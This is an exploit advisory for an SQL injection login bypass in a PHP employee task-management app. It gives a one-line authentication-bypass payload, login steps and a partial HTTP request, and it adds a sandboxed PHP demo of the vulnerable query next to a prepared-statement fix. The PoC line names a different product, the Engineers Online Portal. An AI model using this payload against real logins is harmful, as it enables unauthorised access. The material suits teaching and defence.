Exploits / Vulnerability Discovered: 2021-12-09
Type: webapps
Platform: php
This exploit / vulnerability, Employees Daily Task Management System 1.0 username SQLi authentication bypass, is for educational purposes only; if you use it, you do so at your own risk.
An SQL injection vulnerability exists in the Employees Daily Task Management System admin login form, which can allow an attacker to bypass authentication.
Steps to exploit:
1) Navigate to http://localhost/login.php
2) Insert your payload in the user or password field
3) Click login
Proof of concept (PoC):
The following payload will allow you to bypass the authentication mechanism of the Engineers Online Portal login form:
123'+or+1=1+--+-
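Why a payload of this shape succeeds, and the fix, shown as an added example that is not the application's own code: a login check built by string concatenation next to one that uses a bound parameter and `password_verify()`. The table name, column names, function names and the in-memory SQLite database are assumptions made for illustration.

```php
<?php
// Added illustration. Schema and function names are hypothetical,
// not taken from Employees Daily Task Management System.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE employee_list (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT)');
$ins = $db->prepare('INSERT INTO employee_list (username, password) VALUES (?, ?)');
$ins->execute(['alice', password_hash('correct horse', PASSWORD_DEFAULT)]); // constructed account

// Vulnerable pattern: request values are pasted into the SQL text, so a quote
// in $user ends the string literal and the rest is parsed as SQL.
function login_concat(PDO $db, string $user, string $pass): bool
{
    $sql = "SELECT id FROM employee_list WHERE username = '$user' AND password = '$pass'";
    return $db->query($sql)->fetch() !== false;
}

// Hardened pattern: the username travels as a bound parameter (data, never SQL),
// and the password is checked in PHP against a salted hash.
function login_prepared(PDO $db, string $user, string $pass): bool
{
    $stmt = $db->prepare('SELECT password FROM employee_list WHERE username = :u');
    $stmt->execute([':u' => $user]);
    $hash = $stmt->fetchColumn();
    return is_string($hash) && password_verify($pass, $hash);
}

// URL-decoded form of the payload quoted on this page.
$payload = "123' or 1=1 -- -";

$cases = [
    'concatenated query, payload as username'  => login_concat($db, $payload, 'x'),
    'prepared statement, payload as username'  => login_prepared($db, $payload, 'x'),
    'prepared statement, wrong password'       => login_prepared($db, 'alice', 'guess'),
    'prepared statement, correct credentials'  => login_prepared($db, 'alice', 'correct horse'),
];
foreach ($cases as $label => $accepted) {
    printf("%-42s %s\n", $label, $accepted ? 'ACCEPTED' : 'rejected');
}
```

With the concatenated query the `or 1=1` condition matches every row and the trailing comment discards the password comparison; the prepared statement treats the same input as a literal username that matches no account.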
---
POST /Actions.php?a=employee_login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0